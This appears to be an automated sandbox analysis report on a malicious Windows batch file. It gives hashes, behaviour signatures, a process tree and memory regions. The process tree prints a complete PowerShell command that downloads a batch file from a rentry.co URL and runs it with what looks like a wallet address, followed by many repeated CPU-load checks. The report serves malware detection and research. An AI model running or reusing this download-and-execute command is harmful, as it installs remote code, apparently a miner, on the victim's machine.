Analysis
-
max time kernel
148s -
max time network
51s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
01-07-2024 03:24
General
-
Target
29902733429415.bat
-
Size
517B
-
MD5
ac9d73455d58bfa42f81e718b8c8d6b5
-
SHA1
60040fff333b7bc09b22e5c013f11b8a99555ed3
-
SHA256
4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
-
SHA512
ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://rentry.co/regele/raw
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Delays execution with timeout.exe 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\29902733429415.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_la1grm1s.5ga.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/2288-0-0x00007FF9F65B3000-0x00007FF9F65B5000-memory.dmpFilesize
8KB
-
memory/2288-7-0x000001F8D6740000-0x000001F8D6762000-memory.dmpFilesize
136KB
-
memory/2288-11-0x00007FF9F65B0000-0x00007FF9F7071000-memory.dmpFilesize
10.8MB
-
memory/2288-12-0x00007FF9F65B0000-0x00007FF9F7071000-memory.dmpFilesize
10.8MB
-
memory/2288-13-0x00007FF9F65B0000-0x00007FF9F7071000-memory.dmpFilesize
10.8MB
-
memory/2288-17-0x00007FF9F65B0000-0x00007FF9F7071000-memory.dmpFilesize
10.8MB
-
memory/2288-16-0x00007FF9F65B0000-0x00007FF9F7071000-memory.dmpFilesize
10.8MB